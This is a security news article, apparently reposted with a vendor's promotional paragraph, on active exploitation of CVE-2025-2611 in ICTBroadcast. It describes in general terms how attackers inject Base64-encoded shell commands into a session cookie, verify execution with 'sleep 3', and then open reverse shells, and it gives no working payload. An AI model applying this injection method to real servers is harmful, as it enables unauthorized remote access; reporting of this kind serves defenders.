Cybersecurity researchers have revealed that a severe security flaw in ICTBroadcast, an autodialer software, is actively being exploited by hackers. The vulnerability allows unauthenticated attackers to gain remote code execution, enabling them to establish reverse shells on vulnerable servers. This exploit targets specific versions of the software, and initial exploitation attempts were detected on October 11th.

Key Takeaways

• A critical vulnerability (CVE-2025-2611) in ICTBroadcast allows unauthenticated remote code execution.

• Attackers exploit the vulnerability by injecting shell commands into the BROADCAST session cookie.

• The flaw affects ICTBroadcast versions 7.4 and below.

• In-the-wild exploitation involves a two-phase approach: exploit check and reverse shell establishment.

• Overlap with previously identified malicious activity suggests potential reuse of tools or shared infrastructure.

The Vulnerability Explained

The security flaw, identified as CVE-2025-2611 with a high CVSS score of 9.3, stems from improper input validation within ICTBroadcast. The autodialer application insecurely processes session cookie data, allowing attackers to inject malicious shell commands directly into the BROADCAST cookie. When processed by the vulnerable server, these injected commands are executed, granting the attacker remote code execution capabilities.

Exploitation in the Wild

Security firm VulnCheck observed active exploitation of this vulnerability starting on October 11th. The attacks appear to follow a two-stage process. Initially, attackers send specially crafted HTTP requests containing a Base64-encoded command, such as "sleep 3," within the BROADCAST cookie to verify if the command execution is successful. Following confirmation, the attackers proceed to establish reverse shells on the compromised systems.

Attacker Tactics and Infrastructure

During their analysis, researchers noted the use of a URL in the payload for establishing reverse shells, along with connections to the IP address . These indicators have previously been associated with a Java-based remote access trojan (RAT) named Ratty RAT, which was distributed through an email campaign targeting organizations in Spain, Italy, and Portugal. This overlap suggests that the threat actors exploiting ICTBroadcast may be reusing tools or sharing infrastructure with other malicious operations.

Affected Versions and Mitigation

The vulnerability specifically impacts ICTBroadcast versions 7.4 and earlier. At the time of reporting, there was no information available regarding a patch or update from ICT Innovations to address this critical security flaw. Organizations using affected versions of ICTBroadcast are strongly advised to monitor their systems and seek guidance from the vendor regarding mitigation strategies.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Key Takeaways

• Hackers Target ICTBroadcast Servers via Cookie Exploit to Gain Remote Shell Access, The Hacker News.